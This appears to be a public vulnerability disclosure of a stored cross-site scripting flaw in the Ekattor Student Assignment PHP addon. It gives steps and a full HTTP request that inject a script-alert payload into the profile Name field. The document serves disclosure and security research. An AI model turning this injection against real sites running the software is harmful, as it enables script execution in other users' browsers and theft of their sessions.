# Exploit Title: Ekattor Student Assignment php script-Stored XSS # Date:2021-06-4 # Exploit Author: Mostafa Farzaneh - Smiling.Hunter@protonmail.com # Vendor Homepage: https://codecanyon.net/user/creativeitem # Software Link: https://codecanyon.net/item/ekattor-student-assignment-addon/30416274 # Tested on: Ubuntu #How To Produce it : 1-Go to /demo/v7/login 2-Login to your Account(teacher or student or parrent,...) 3-Navigate to My account=>Update profile 4-edite "Name" feild to "<script>alert('xss')</script>" 5-Now, malicious code is executed wherever the user name is ready on the site POST /demo/v7addon/teacher/profile/update_profile HTTP/1.1 Host: localhost Content-Length: 651 Accept: application/json, text/javascript, */*; q=0.01 DNT: 1 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundarysm60AiiVmAB6CmzY Origin: localhost Referer: http://localhost/demo/v7addon/teacher/profile Accept-Encoding: gzip, deflate Accept-Language: fa-IR,fa;q=0.9,en-US;q=0.8,en-XA;q=0.7,en;q=0.6 Cookie: ci_session=290c7b11d9e9f03c8e7a18b0d471b36741ec98b5 Connection: close ------WebKitFormBoundarysm60AiiVmAB6CmzY Content-Disposition: form-data; name="name" Alison <script>alert('xss')</script> ------WebKitFormBoundarysm60AiiVmAB6CmzY Content-Disposition: form-data; name="email" teacher@example.com ------WebKitFormBoundarysm60AiiVmAB6CmzY Content-Disposition: form-data; name="phone" 345020212 ------WebKitFormBoundarysm60AiiVmAB6CmzY Content-Disposition: form-data; name="address" 82 Kuen Suk Shuen Tsuen Hang Hiu Kowloon ------WebKitFormBoundarysm60AiiVmAB6CmzY Content-Disposition: form-data; name="profile_image"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundarysm60AiiVmAB6CmzY-- ********************************************************* #Discovered by: Mostafa Farzaneh #Telegram: @pyweb_security *********************************************************